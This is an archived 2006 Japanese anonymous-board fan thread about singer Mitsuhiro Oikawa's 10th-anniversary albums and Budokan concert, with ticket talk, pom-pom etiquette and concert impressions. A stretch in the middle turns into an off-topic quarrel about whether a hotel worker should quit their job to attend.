5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

及川光博パート12〜愛し愛されて10周年〜

1 :NO MUSIC NO NAME:2006/05/24(水) 01:09:43 ID:L1XtMNIo
5/29のモラリティの日で11年目突入。
愛し愛されて10周年。ベストをつくしました。
5/24には「光」「博」のベストアルバム発売!

荒らし、叩き、煽り、粘着はスルーor脳内あぼーん推奨。
かまっちゃう人も荒らしです。
ご新規さん歓迎、ただし書き込みは過去ログを読んでから!
荒らし避けのためにもsage進行でおながいします。
(E-Mail欄に半角小文字でsageと入れること)
保守もsageでよろしくおながいします。

【前スレ】
及川光博パート11〜意志の上にも10年〜
http://music5.2ch.net/test/read.cgi/musicjm/1133879905/

2 :NO MUSIC NO NAME:2006/05/24(水) 01:11:02 ID:L1XtMNIo
【過去スレ】
及川光博
http://music.2ch.net/musicj/kako/1007/10072/1007232205.html
及川光博パート2〜俺、燃えてる〜
http://music.2ch.net/musicj/kako/1014/10147/1014708716.html
及川光博パート3〜レッツ自己解放。〜
http://cocoa.2ch.net/test/read.cgi/musicj/1026059094/(html化待ち)
及川光博パート4〜さぁ!!きっとサーキット(仮)〜
http://tv3.2ch.net/musicj/kako/1031/10317/1031763822.html
及川光博パート5〜みっちーGO!GO!GO!!〜
http://music2.2ch.net/test/read.cgi/musicj/1039024285/(html化待ち)
及川光博パート6〜レッツ!うっとり(仮)〜
http://music2.2ch.net/test/read.cgi/musicj/1048540683/(html化待ち)
及川光博007〜ヘルシアより愛をこめて〜
http://ex5.2ch.net/test/read.cgi/musicj/1063584466/(html化待ち)
及川光博08〜Ride ON Baby!!〜
http://ex5.2ch.net/test/read.cgi/musicj/1089554577/(html化待ち)
及川光博パート9〜男盛り〜
http://music4.2ch.net/test/read.cgi/musicj/1101954687/(html化待ち)
及川光博パート10〜記念日はノープラン〜
http://music5.2ch.net/test/read.cgi/musicjm/1112595458/(html化待ち)

3 :NO MUSIC NO NAME:2006/05/24(水) 01:11:54 ID:L1XtMNIo
◆ ミッチー過去ログ倉庫 ◆
http://roo.to/mitchy/

初心者への誘導は「過去スレ嫁」で。
倉庫でいろいろ調べられまつ。(検索機能付き)
そこまでしても辿り着けない人は、スルーでよろです。

倉庫番タンには常に感謝の心を。

4 :NO MUSIC NO NAME:2006/05/24(水) 01:13:33 ID:Oo0LA8NM
>>1タン乙です!

5 :NO MUSIC NO NAME:2006/05/24(水) 20:27:58 ID:zgVA8+U6
近所のCD屋さん行ったら「博」しかなかったよ。(´・ω・`)
「光」のほうだったら買ってもよかったのになぁ・・・

6 :NO MUSIC NO NAME:2006/05/24(水) 20:34:52 ID:CN3HEMjP
10周年のご祝儀に、両方買ってあげなよぅ。

7 :NO MUSIC NO NAME:2006/05/24(水) 20:39:22 ID:v3vYkn33
そうだよぅ。買ってあげなよぅ。

8 :NO MUSIC NO NAME:2006/05/24(水) 21:13:12 ID:Z1dxRzSG
禿同だよぅ。

9 :NO MUSIC NO NAME:2006/05/24(水) 21:27:51 ID:yMHN8zUZ
密林が今日届けてくれたよぅ。
カバー入れるなとは言わないが
よりよって愛メモかよぅ。

10 :NO MUSIC NO NAME:2006/05/24(水) 21:30:47 ID:zgVA8+U6
給料日前だから余裕ないんだよぅ。゚(゚´Д`゚)゚。

11 :NO MUSIC NO NAME:2006/05/24(水) 21:42:50 ID:Z1dxRzSG
じゃあ給料出たら買って上げなよぅ。

12 :NO MUSIC NO NAME:2006/05/24(水) 22:14:48 ID:wJAJTfZW
しばらくは店頭にも並ぶでしょ。
私は楽天に今日注文したw ポイント使って1,000円オフ。

13 :NO MUSIC NO NAME:2006/05/24(水) 23:52:41 ID:CN3HEMjP
あーあ、空気が読めない>>12のおかげで途切れちゃった…。
空気が読めない上に自分語りだし。

14 :NO MUSIC NO NAME:2006/05/25(木) 00:12:52 ID:4bGTJjtJ
まぁまぁ、みんな仲良くしましょうよぅ。(*´д`)

そいえば「家庭内デート」、グループ魂の暴動&遅刻さんコンビ
作品なんだね。.:*・゚(n‘∀‘)η゚・*:.。. .。.:*
遅刻さんサングラス外すとちょとミチーっぽいから好きさっwww

15 :NO MUSIC NO NAME:2006/05/25(木) 01:14:56 ID:e+EZy45M
ttp://www.oikawa-mitsuhiro.com/free/information/release.html?id=66
サントラはどう?

16 :NO MUSIC NO NAME:2006/05/25(木) 02:22:33 ID:nNoM0IJF
買うよぅ!

17 :NO MUSIC NO NAME:2006/05/25(木) 06:43:10 ID:KySbthIS
昼ドラにしては内容が盛りだくさんみたいだし、
もちろん買うよぅ。

18 :NO MUSIC NO NAME:2006/05/26(金) 13:24:39 ID:dpJb3nfv
「家庭内デート」の編曲担当の上杉氏は、斉藤さんのアルバムに参加してた人らしいよぅ。

19 :NO MUSIC NO NAME:2006/05/26(金) 20:18:52 ID:AOVsQokl
みちスレだからちょっとスレチだけど
家庭内デートの由貴さんの「いっちゃった♪」のとこ可愛い。

20 :NO MUSIC NO NAME:2006/05/26(金) 22:45:05 ID:wMAxEEkN
「なんだよぅ」も可愛いはず。

21 :NO MUSIC NO NAME:2006/05/27(土) 16:44:06 ID:8c3GlFeY
今日の厚生年金一枚余ってしまった…
現地ですがチケット探してる方はいないですかね…?


22 :NO MUSIC NO NAME:2006/05/27(土) 22:47:53 ID:gqKiRPkL
>>21
ノシ

23 :NO MUSIC NO NAME:2006/05/29(月) 00:44:43 ID:0deNG2G0
モラリティーの日、おめでとう!
10年間ありがとう。
11年目も、それ以降も、ずっとずっと愛してる。

24 :NO MUSIC NO NAME:2006/05/29(月) 20:06:43 ID:gwgz9KYZ
ミチーおめでとう!
じいさんになっても愛してる!

25 :NO MUSIC NO NAME:2006/05/31(水) 08:22:51 ID:Fb/HZeE7
SDR入ってる人いる?カードっの名前の刻印って、姓名でされてた?それとも名前が先だった?
カードがMitsuhiro oikawaって入ってるのに自分の刻印は、名字が先だよ…orz

26 :NO MUSIC NO NAME:2006/05/31(水) 10:35:58 ID:6AGLMEqi
>>25に同じ。
sageてね。

27 :NO MUSIC NO NAME:2006/05/31(水) 21:58:14 ID:sqFo0/cC
髪質がすばらしい
艶があってコシがあって
どんな髪型でも対応できそうだ

28 :NO MUSIC NO NAME:2006/06/03(土) 18:44:50 ID:LWIP+3hn
保守〜!

29 :NO MUSIC NO NAME:2006/06/04(日) 14:44:18 ID:h5ibWXHK
女騎馬戦でホシュ

30 :NO MUSIC NO NAME:2006/06/04(日) 22:49:40 ID:MWXmW5Bp
ファイナル。。うーーん行きたかった。。
武道館は赤と白を基調に。って、ワールドカップだから日本代表を応援する意味もあって
日の丸の色にかけてみたのかなぁ。。


31 :NO MUSIC NO NAME:2006/06/04(日) 22:52:20 ID:W7sjVD2P
>>30
武道館に日の丸が掛けてあるから。

32 :NO MUSIC NO NAME:2006/06/05(月) 00:17:13 ID:XjmrLJFu
そしてそれははずせないから。

33 :NO MUSIC NO NAME:2006/06/05(月) 00:26:05 ID:Q7kAKL4D
光=こう、博=はく、だからでしょ。
って、ボケた方がよかったかな…。ポンポンは白指定でしたっけ?

34 :NO MUSIC NO NAME:2006/06/05(月) 08:49:41 ID:YRVeySVm
そう。白指定!

35 :NO MUSIC NO NAME:2006/06/05(月) 16:06:32 ID:6X+Rvxmt
セットが赤白だからって言い方してたけどね

36 :NO MUSIC NO NAME:2006/06/05(月) 23:33:17 ID:u5yVkR6Q
6/9に武道館に来る方、赤か白の服で着てね。ポンポンは白ですよ〜♪

37 :NO MUSIC NO NAME:2006/06/06(火) 00:39:33 ID:Y9zZ/nJZ
今ツアーでもポソポソデカ過ぎる香具師多杉。
手のひらサイズって言われてるだろ!

38 :NO MUSIC NO NAME:2006/06/06(火) 01:01:01 ID:Vbl8b6gq
新規が増えたんでない?
ここのとこポンポンについてミチー何も言ってないしな。

39 :NO MUSIC NO NAME:2006/06/06(火) 01:13:10 ID:d47epIGD
舞踏館は一夜限りのスペシャルなんだから盛大にポンポン振ってあげようよ
ちまちま小さいの振ってたたら絵的に寂しいもん

40 :NO MUSIC NO NAME:2006/06/06(火) 01:24:27 ID:L6R8nN1q
ん〜、みんな楽しみにしてる曲なんだし、後ろの人のジャマはしたくないわ。
手のひらサイズのポンポンでも、張り切ってw振れば華やかだと思うよ。

41 :NO MUSIC NO NAME:2006/06/06(火) 02:11:29 ID:9BOLsg3H
6/9のポソポソの大きさについては噂板で前スレから議論気味中。
手のひらサイズが無難っていう流れみたいですね。
周りに顰蹙かっても恨まれても大きいポソポソ振りたい!後悔したくない!
って思うなら思い切ってどうぞ。

42 :NO MUSIC NO NAME:2006/06/06(火) 02:52:44 ID:d47epIGD
やらずに後悔するよりも、やって後悔しましょうよ

43 :NO MUSIC NO NAME:2006/06/06(火) 03:10:41 ID:KGR/fBYd
あなたのは狡獪だよ。

44 :NO MUSIC NO NAME:2006/06/06(火) 03:13:53 ID:MkbhjOLQ
通常ワンマンショーでデカいの持ってると
初心者だってまるわかりだから逆に恥ずかしくなるんじゃない?
ま、武道館はお祭りだからやりたければ好きに汁

45 :NO MUSIC NO NAME:2006/06/06(火) 06:42:31 ID:pd67BgyV
>>42
やったもん勝ち・・・ですか。
はぁ。。。

46 :NO MUSIC NO NAME:2006/06/06(火) 14:48:56 ID:pbus6dcm
周りに迷惑をかけない心美人は掌サイズだと思いますけどね。

・スズランテープで作るベイベに小技を
1.親指のつけねにテープの先を挟む
2.挟んだまま、膝を曲げた所にひっかけ、親指の所に戻していく
3.そのやり方で輪を15〜20回巻く。
4.腕から外して中心を結び、輪の部分を切り、裂いていく

だいたい、掌サイズになりますよ。

47 :NO MUSIC NO NAME:2006/06/06(火) 17:33:57 ID:oVccaCba
ところで
AORってAdult Oriented RockとAlbum Oriented Rock
どちらにも解釈できるの?どちらかが正解なの?
フォーラム2日目のミチーの蘊蓄がよくわからない。

48 :NO MUSIC NO NAME:2006/06/06(火) 17:43:44 ID:BtFujj35
AORの日本とアメリカでの使われ方の違い
AORの最初の使われ方は、ピンク・フロイドやイエスなどの、シングルではなく
アルバムを重視したスタイルのロックを指すAlbum Oriented Rockの略であった。
アメリカでは現在もこの意味で使われている。

ちょうどAORが使われだした1980年前後では、プログレッシブ・ロックを
アメリカ流にアレンジしたアメリカン・プログレ・ハードと呼ばれるジャンルが出現した時期でもあった。
カンサスやボストンといったバンドが代表的なアメリカン・プログレ・ハードであるが、
アルバム中心主義でありながら聴いていて心地よい落ち着いたサウンドであったため、
「大人向けロック=Adult Oriented Rock」と解釈されて日本に輸入された。

その後、日本ではこの意味での独自の解釈が進み、
現在ではボズ・スキャッグスやTOTO、クリストファー・クロスといった大人向けポップ/ロックアーティストのジャンルとして定着している。
なお、アメリカのビルボード誌では、このジャンルはAdult Contemporary(AC)と呼ばれる。

49 :NO MUSIC NO NAME:2006/06/06(火) 17:51:32 ID:oVccaCba
早速の詳しい解説ありがとうございました。
よくわかりました。

50 :NO MUSIC NO NAME:2006/06/06(火) 20:22:30 ID:+oGsS1U2
ミチーがそれについて話してたのかい??

51 :NO MUSIC NO NAME:2006/06/06(火) 21:36:54 ID:BXDb4ZRJ
話してた。
チャートには興味がなくなったという話の流れからだったと思うけど、
>>48タンの説明のとおり、Adult Oriented Rockと誤解釈されているが、正しくはAlbum Oriented Rockだと簡単に説明して、
AORを目指したいだったか、AORで行くだったか、そんなことを言った。
私も?だったので48タンの説明はありがたい。

52 :NO MUSIC NO NAME:2006/06/06(火) 22:01:36 ID:Ch2D/rQZ
舞踏館に赤パジャマ着ていくお!

53 :NO MUSIC NO NAME:2006/06/06(火) 22:02:52 ID:PTHFGnLx
赤パジャマはおしゃれなのか?
おしゃれしてかなくて、いいのか?

54 :NO MUSIC NO NAME:2006/06/06(火) 22:05:19 ID:dmhU/R0W
「光」「博」の曲順にもこだわってるから注目してね、ってこと言ってたね。

55 :NO MUSIC NO NAME:2006/06/07(水) 09:50:03 ID:1rWH93I7
赤パジャマ最強伝説。

56 :NO MUSIC NO NAME:2006/06/07(水) 11:16:22 ID:L/OZR2mp
>>54
赤パジャマで興味をもった者ですが、アルバムはミッチー初心者でも楽しめますか?

57 :NO MUSIC NO NAME:2006/06/07(水) 12:11:41 ID:gnVETlES
もちろんです。是非どうぞ。

58 :NO MUSIC NO NAME:2006/06/07(水) 13:30:27 ID:hlbP8rfc
今なら武道館に間に合いますよ

59 :NO MUSIC NO NAME:2006/06/07(水) 13:34:04 ID:fJYR+EuX
初心者にはライブDVDも強くお勧めします。

60 :NO MUSIC NO NAME:2006/06/07(水) 13:55:39 ID:L/OZR2mp
>>57-59
レスありがとうございました。光博を聴いてDVDを借りてみようと思います。

61 :NO MUSIC NO NAME:2006/06/07(水) 16:51:39 ID:hlbP8rfc
出来ればDVDを先に推奨w

62 :NO MUSIC NO NAME:2006/06/07(水) 19:18:34 ID:55h/H7Ng
上に同じく

63 :NO MUSIC NO NAME:2006/06/07(水) 19:27:13 ID:gnVETlES
光博も映像付いてるしいいんでね?

64 :NO MUSIC NO NAME:2006/06/07(水) 22:11:29 ID:/2wt+I5C
というよりも武道館へ!
もしも時間が空いていれば武道館へ!
米に描いたような顔でも武道館へ!
ライヴのふいんき(←なぜかry)を体験してホスィ…
しばらくライヴは無いと思うし、興味を持った今がチャンス!


必 死 だ な <漏れ

65 :NO MUSIC NO NAME:2006/06/07(水) 22:16:47 ID:KfttaS5E
それに、今回みたいなお祭りイベント的なライブは
当分ないだろうしね。
ぜひ武道館へ!

66 :NO MUSIC NO NAME:2006/06/07(水) 22:41:43 ID:dhFH1gP+
仕事の都合でどうしてもで舞踏館参加できないのカナシス_| ̄|○

67 :NO MUSIC NO NAME:2006/06/07(水) 22:55:46 ID:HgpoIV83
一生に一度のイベントよりも大事な仕事なんてあるのか?
仕事なんぞ毎日やってんだからいつだってイイじゃん!

なんなら辞めちゃったってイイじゃん!
仕事なんぞ山ほどあるよ、今の仕事はそんなに儲かるのか?

68 :NO MUSIC NO NAME:2006/06/07(水) 23:37:54 ID:49fbmLnJ
それもかなりどうかと思うが

69 :NO MUSIC NO NAME:2006/06/08(木) 00:16:10 ID:GN4vfq/0
何年かぶりに行ったライブが楽しかったんで
武道館もと思ったんだが
チケ手にはいんね〜…
orz

70 :NO MUSIC NO NAME:2006/06/08(木) 00:19:49 ID:pmKj2SQz
選り好みしなければファソサイトもオクも出てるのに。
そりゃ末端席は嫌かもしれないが……

71 :NO MUSIC NO NAME:2006/06/08(木) 00:39:52 ID:TLGeUkKJ
>>69
絶対に当日券あるよ。

72 :NO MUSIC NO NAME:2006/06/08(木) 01:12:07 ID:seiGwGf+
ファンサイトなら半額程度でも手に入るよ。たしかに天井席かもだけど。


73 :NO MUSIC NO NAME:2006/06/08(木) 09:15:03 ID:kL70OSiI
なんなら、仕事で行けない漏れのチケットを…

74 :NO MUSIC NO NAME:2006/06/08(木) 19:39:35 ID:+F0koi8K
だから仕事なんぞ休めっていってるだろ?
おまえ一人抜けたって会社はなんとも無いよw

休ませない会社は労働基準法違反なので訴えればいいだけの話

それともオマエが居ないと困るソープかなんかで働いてるのか?
それなら謝る。

75 :NO MUSIC NO NAME:2006/06/08(木) 19:43:52 ID:LyiEojfa
バックダンサーは準備オッケィでーーす。
一つ不安なことが。。バックダンサー席ってミッチーの背中見てるのかしら・・
顔見て−よぅ。。

76 :NO MUSIC NO NAME:2006/06/08(木) 19:49:48 ID:gJmXXwSb
もちろん何度か後ろ向いてくれるさ!!
ほとんど背中かもしれないがかなり近いみたいね
ダンサー頑張ってね!!

77 :NO MUSIC NO NAME:2006/06/08(木) 22:57:24 ID:7rCxS64n
ポンポン・・・白指定かよ・・・orz
思いっきり紅白で作ってたわ。


78 :ラブラブ:2006/06/08(木) 23:03:14 ID:9F/FTyzV
とうとう明日!フォーラム行けないから激しく楽しみにしてるよー!
ポンポン新しく作り直したし、白い服で、友人は赤で…めでたい二人の出来上がり。恥ずかすぃー

79 :NO MUSIC NO NAME:2006/06/09(金) 16:22:58 ID:qeuf5Elk
今舞踏館にむかってます!今日何時くらいに終わりますかね?

80 :NO MUSIC NO NAME:2006/06/10(土) 14:12:18 ID:i6b3ZOcD
9時過ぎ

81 :NO MUSIC NO NAME:2006/06/10(土) 15:16:50 ID:n9d6HLsv
愛哲も無しでジャスト3時間、凄かったね〜!!

82 :NO MUSIC NO NAME:2006/06/10(土) 19:42:24 ID:a9K/FN53
演出お金かかってたねー。火がボッて出た時2階席まで熱かったよ。3回位したね。

83 :NO MUSIC NO NAME:2006/06/11(日) 00:20:12 ID:/TY2TtRj
武道館、6800人しか入らなかったってびっくり
もっと人気あると思ってた

84 :NO MUSIC NO NAME:2006/06/11(日) 02:32:54 ID:9zd9Gglj
花道の都合で、アリーナのキャパを減らさなきゃダメだったらしいし。
幕で覆っていた2階のウイング席以外は客で埋まってたから、ほぼ満席かと。

85 :NO MUSIC NO NAME:2006/06/11(日) 02:50:50 ID:02CAp+8y
はじっこに幕は確かにあったけど、気にならない程度だったと思う。
満席っぽい感じに私も見えたよ。

86 :NO MUSIC NO NAME:2006/06/11(日) 07:02:28 ID:Woj0DOs7
逆に6800「も」入ったこと、うれしい驚きだった。
フォーラムファイナル4500と併せて、とにかく安心。
今ツアー、関西以外の動員、しんどかったから。

87 :NO MUSIC NO NAME:2006/06/11(日) 10:08:00 ID:zx+RPv5q
でも、あと百人くらいなら入ったんじゃないかな〜。
まあ、あのステージプランじゃあれで満席な気がするよ。

自分の斜め後ろの席の2人組がはしゃぎすぎでうざかった。
周りの席の人、引いてたし。
注射の話のときに「みゃ〜!!!」とか叫んでたし。
ミチーへの愛が深いのはわかるけどね…。

88 :NO MUSIC NO NAME:2006/06/11(日) 12:16:39 ID:6BSECVKZ
ダンサーがエロすぎ。ミチーさわりすぎ。

89 :NO MUSIC NO NAME:2006/06/11(日) 14:16:51 ID:9zd9Gglj
改めて、武道館よかったねー。たくさんのラヴに感動!
まあ、隣べいべーのサイリウムがずーっとまぶしかったり、
前べいべーがしだれ桜のようなポンポンで、みっちーが見えなかったけどさ…orz

90 :NO MUSIC NO NAME:2006/06/11(日) 21:19:12 ID:LxjR+6RV
いつでも全力疾走なミチーに惚れ直しますた。

残りの諸々が済んだらゆっくりお休みして欲しいなぁ。

91 :NO MUSIC NO NAME:2006/06/12(月) 07:59:14 ID:62FIgG/W
ゆっくり休んで、充電して次の創作につなげて欲しい。
俳優業はオファを選択だけど、音楽は茨の道だものね。

歌番組を含めて今のメディア、音楽業界に批判的なコメントが
あって、確かにその通りだと思うけど…
そういう条件のなかでやってるのはみちーだけじゃないから。
べいべ達の愛(深くて気長)を信じてすすんでいってね。

92 :NO MUSIC NO NAME:2006/06/12(月) 18:35:25 ID:RQRtWrCM
私達の愛がミッチーを永遠にするのよ!
なんだかわからんが、とにかくLOVEなのよ!
行くわよーー!11年目!!

93 :NO MUSIC NO NAME:2006/06/12(月) 19:56:48 ID:Oyg7wMrj
73>74
べいべたちがよくお客さんで来るビジネスホテルで勤務ですがなにか?夜中も一人ですしシフトの希望は出せないので、休みが簡単に受け入れられる仕事ではありません。
もちろん武道館当日もべいべが何組かいらっしゃいましたよ。
赤と白の服着てお出かけされましたのですぐわかりました。

94 :NO MUSIC NO NAME:2006/06/12(月) 20:23:33 ID:gc0UZsAE
休みが簡単に受け入れられない仕事って辛いなぁ。
一般企業でもあるけどさ。有給あるのに使えないとかね。

95 :NO MUSIC NO NAME:2006/06/12(月) 20:30:02 ID:WwnHXs0q
>>94
そんなとこは労働基準法違反なので訴えてから
辞めればいいじゃん。

絶対に勝訴できるので金も取れるしいうことないじゃん


96 :NO MUSIC NO NAME:2006/06/12(月) 20:43:04 ID:pZGSfq/q
>>95がどんな仕事をして、
どんな境遇なのかが気になる。

…釣られた?


97 :NO MUSIC NO NAME:2006/06/12(月) 20:56:12 ID:Oyg7wMrj
はぁ?
簡単にやめろなんてよく言えるよ。責任感が全く感じられない。
中途半端な仕事してるからそんなこといえるんだろ。
ミッチーも好きで仕事も好き。労働基準法だって一般の事務とかとは違うのでは?特殊な労働形態だし、希望は出せなくとも決められた休みはガッツリもらえるしね。やめる理由無いものw

98 :NO MUSIC NO NAME:2006/06/12(月) 21:06:08 ID:WwnHXs0q
>>97
夜中1人になっちゃう様な安ホテルにお勤めなんて偉いねぇw凄いねぇw

安ビジネスホテルのフロントなんてさ、君がどんなに頑張ろうと中途半端な仕事じゃんか?

もっと向上心を持ちなさい、今の低レベルな生活に満足してちゃダメだよ

99 :NO MUSIC NO NAME:2006/06/12(月) 21:14:29 ID:Oyg7wMrj
釣られたか。

100 :NO MUSIC NO NAME:2006/06/12(月) 22:30:40 ID:aW8T93cC
>>97
最後の2行にちょっとびっくり
その仕事が好きなんだ??
取り合えず事務をバカにするのはやめろ

101 :NO MUSIC NO NAME:2006/06/12(月) 23:29:28 ID:Oyg7wMrj
してねーしwそこまで言ってないだろうが。雇用形態が違うって事だよ。
事務してたって、いいじゃんか。その人が、充実してりゃそれでいいと思うよ。価値感はそれぞれだと思うが、何もわからず無責任に辞めてしまえと言う事に対しては、いかがかと思う。


102 :NO MUSIC NO NAME:2006/06/12(月) 23:53:15 ID:xvqn/QSL
休めないとか文句言うくせになぜ奴隷に徹するか?って事だよ
嫌なら態度で示せばいいだろ?

文句ばっかりいって行動にうつさないなんてバッカじゃん

103 :NO MUSIC NO NAME:2006/06/12(月) 23:54:27 ID:P+4nFyC8
何スレだよここ

104 :NO MUSIC NO NAME:2006/06/13(火) 00:04:35 ID:cmqeUWJX
事務は簡単に休み取れるって感じに読めたがね
休み希望出せないなんてライブが趣味の人には厳しくないの?
私もシフト制で遅番、早番と不規則、しかも残業100時間なんて時も
なんていう仕事してるけど休み希望だけは通させてもらってるよ
じゃないと何の為に働いてるのか
あなたが自分の都合とミチーの都合が合った時だけライブに行ければいいならそれでいいと思う
それぞれの価値観だし
でもミチー抜きにしてもその勤務体制はキツくないか??とは思うけど


105 :NO MUSIC NO NAME:2006/06/13(火) 00:16:59 ID:SHHvBoWu
ヲイヲイw
休めない事に文句言ってないだろうにw
もともとは、仕事ほっぽり出して武道館行けよと言う事が、おかしい、という事でそ。
好きでやってる事だからいいんでないか。
好きでやってる仕事に文句つけられたら誰だって怒るわな。
ミッチーに今やってる仕事辞めてしまえって言ったら
はぁ?
じゃね?
趣味のためにバイトしてる人や、やりたい仕事のために、夢追い続けて頑張ってる人に、大変だから辞めちゃいなとか、そんな事はナンセンスって言ったら、怒るよ。
バカにするなと言っておいて、バカにしてないか。

106 :NO MUSIC NO NAME:2006/06/13(火) 00:22:55 ID:cmqeUWJX
ん?私に言ってる?100=104は私だけど102は違うよ
何か変な事言ったかな
仕事放り出してライブ行けよはおかしいと思うよ
なんか熱くなってるんで失礼するわ
お仕事頑張ってください


107 :NO MUSIC NO NAME:2006/06/13(火) 00:25:57 ID:TatYoEeL
それなら「休めないから行けない」とか会社に文句言うなよ

自分の責任なんだから「来られない」なら最初から「行けない」とか書くなよ

文句ばっかり言ってんなら辞めろよ、イヤイヤやってる仕事に何の意味があるんだよ?


108 :NO MUSIC NO NAME:2006/06/13(火) 00:27:01 ID:SPmGiAj3
スレ違い

109 :NO MUSIC NO NAME:2006/06/13(火) 00:33:10 ID:60dJtLqy
サービス業は事務職より偉いって事かよ
サービス業なんてたいした仕事ねぇじゃん、ソープ嬢もサービス業だしな。

110 :NO MUSIC NO NAME:2006/06/13(火) 01:19:18 ID:FHCaGwBa
どうでもいいよもうw

111 :NO MUSIC NO NAME:2006/06/13(火) 01:19:44 ID:SHHvBoWu
おかしいよ。
どんな仕事でも誰かのためになってるんじゃんか。
どんな仕事でも、自信もってやってたら、それでいいんでないか?別に、事務職をバカにしてたりしてないじゃんかw。
どんな仕事でも大変な事あるよ。
ただ、仕事を放り投げる事が出来ないなら、辞めちゃいなっていうのは変じゃないか?


112 :NO MUSIC NO NAME:2006/06/13(火) 02:03:44 ID:pjBpTwe7
>>111
誰にレスしてるのか分からないよ
仕事辛いなら認めちゃいなよ
強がってるようにしか見えないけど
私にはあなたの仕事は辛すぎます

113 :NO MUSIC NO NAME:2006/06/13(火) 11:42:24 ID:mIQIUCBc
そんなことより、赤パジャマベイベは居ましたか?

114 :NO MUSIC NO NAME:2006/06/13(火) 14:20:23 ID:iEvpGIV2
まあ、あれだ。
ミチーもプライベートを(ある程度)犠牲にしたり
業界や仕事自体に文句を言いながらも、頑張ってるジャマイカ。
そんなミチーに“仕事キツいなら、文句言うなら辞めちゃいな。”
って言うのはナンセンスでそ?それと一緒だ。

115 :NO MUSIC NO NAME:2006/06/13(火) 14:34:34 ID:P+HtLgxy
>>114
全然ナンセンスじゃないだろ?本当にいやなら引退したっていいと思うよ

お前はミチーがイヤイヤながらライブやってると思ってるのか?

お前が「今日は仕事だから遊べない」って愚痴る様に
ミチーが「今日はライブ(仕事)だから遊べない」って愚痴ってると?

116 :NO MUSIC NO NAME:2006/06/13(火) 14:53:00 ID:pjBpTwe7
仕事辞めろはおかしいと思うけど
よくそんな仕事で満足してるなとは思う
夜中女一人って危なくないの?

117 :NO MUSIC NO NAME:2006/06/13(火) 14:54:00 ID:fTKH8z0F
>>115
好きな仕事してても、苦手なことやイヤだなと思うことがあって当然でしょう。
みっちーも武道館で愚痴ってたけどw某うたばん組にも出たりとか、
私たちが見えない部分で、いろんな楽しくない“お仕事”をしてると思うよ。

だれでも仕事で楽しみにしてたライブに行けないとか、デートがぽしゃったとかあっても
多少の犠牲を払ってでも続けたい仕事なんだから、辞める必要ないじゃん。
辞める辞めないは本人が決める。それはみっちーだってそうだしべいべーだってそうだ。

あまりにも子供っぽすぎる話だからスルーしてたけど。長文&スレ違いスマソ。

118 :NO MUSIC NO NAME:2006/06/13(火) 15:02:18 ID:P+HtLgxy
>>117
>多少の犠牲を払ってでも続けたい仕事なんだから、辞める必要ないじゃん。
はぁ?ミチーにとっての芸能人って仕事はそうかもしれないが
三流会社の事務や安ビジネスホテルのフロントなんぞ

本当に「続けたい仕事」なのか?

続けないと暮らせないから「続けざるをえない仕事」だろ?

119 :NO MUSIC NO NAME:2006/06/13(火) 19:58:12 ID:joD2DW0g
モメナイ!。。仕事は仕事。。どんな仕事でも良い良い!
要はいかにミッチーのライブを楽しみに毎日を過ごすか・・でしょう?
楽しみの為に仕事するの!何か事情があってライブに行けない時は、ファンのみんなで
行けなかったベイベの為に状況報告してあげるの。
それでいいじゃん?

で・・赤パジャマは、いたの?私も知りたい・・


120 :NO MUSIC NO NAME:2006/06/13(火) 20:00:46 ID:i8EBktWj
自分は見なかった。

121 :NO MUSIC NO NAME:2006/06/13(火) 20:01:56 ID:1cowKNm3
ちよこはいたよね。

122 :NO MUSIC NO NAME:2006/06/13(火) 21:15:19 ID:joD2DW0g
で・・ライブの感想を事細かに教えて頂けないでしょうか?
ぜひとも、感動を分け与えて欲しいのですが・・・


123 :NO MUSIC NO NAME:2006/06/13(火) 22:09:49 ID:Xiab5QwO
感想はブログにわんさかあるよ。
自分としては、意志と月光の総復習で、お祭りとして楽しめたってかんじ。
場所柄音響がいいとは言えないし。

124 :NO MUSIC NO NAME:2006/06/13(火) 22:30:58 ID:fTKH8z0F
1曲目から「三日月姫」だもん、セットリストもデビュー10年のお祭り仕様。
愛哲なしで3時間ぴったり。最後はみっちーも全力尽くした〜って感じ。
「死んでもいい」の時はポンポンが白いお花畑みたいで、壮観だったよw
DVDが出るから、震えて待て。

125 :NO MUSIC NO NAME:2006/06/13(火) 22:49:23 ID:LDaE+x1Y
ココロノヤミと恋ノヒゲキをやらなかったのだけが残念だ。

126 :NO MUSIC NO NAME:2006/06/13(火) 22:55:07 ID:O2YTRoXR
オイラは、カレカノがDVDに入らないのが残念でならない。
フォーラムで撮ったの、どこかで出してくれ〜。

127 :NO MUSIC NO NAME:2006/06/14(水) 14:40:15 ID:9rzNVp6g
どう〜しても「懺悔」を観たかったからDVD注文しちゃったよ。
バタフライも入ってるし。

128 :NO MUSIC NO NAME:2006/06/14(水) 20:06:21 ID:GGNmTySO
武道館の帰り、楽屋のほうで救急車を見た。あれは誰か倒れたのか?
出待ちベイベはちゃんとミチー見れたのか?

129 :NO MUSIC NO NAME:2006/06/14(水) 22:18:29 ID:P3SFycU5
ライブ最高だったんですね。。行けたベイベ達は幸せもんだわ。
DVD楽しみに待ちます。

130 :NO MUSIC NO NAME:2006/06/14(水) 22:25:14 ID:7JkE7J2K
早々と予約してしまった。
すぐの発売日だから副音声なしだろなー。
舞踏館を赤盤にして、ゆっくりでいいから
月光フォーラムを青盤で解説付きで発売してくれたらいいのに。
一応カメラ入れてたんだし。

131 :NO MUSIC NO NAME:2006/06/15(木) 01:27:37 ID:WO8bH6JT
スタンドベイベで顔が見えなかったから
DVD楽しみだ〜。早く見たい!

>>125
禿同!!ココロノヤミはやると思ってたのになー。

132 :NO MUSIC NO NAME:2006/06/15(木) 02:12:44 ID:ImgBpD3z
ココロノヤミは、もう闇の中に居ないから歌わないんじゃないか?
いや、勝手な想像だけど。

133 :NO MUSIC NO NAME:2006/06/15(木) 20:10:27 ID:HPfxT/Z6
>132
意志ツアーでは歌っていたと思うが・・・
大事な曲だからこそ舞踏館でやらなかったんじゃないかな

134 :NO MUSIC NO NAME:2006/06/15(木) 20:12:45 ID:702w5Vn5
単にふいんきに合わなかっただけじゃん?

135 :NO MUSIC NO NAME:2006/06/15(木) 20:34:07 ID:zmUyweie
>>133
>>134
何も知らないんだね(プ

136 :NO MUSIC NO NAME:2006/06/15(木) 20:34:24 ID:Plie3X8E
ミチーの曲は雨にあうねぇ
さすがは雨男だわ。

137 :NO MUSIC NO NAME:2006/06/15(木) 21:32:01 ID:702w5Vn5
>>135
なになに?教えて〜

138 :NO MUSIC NO NAME:2006/06/15(木) 23:03:34 ID:qwYP35tJ
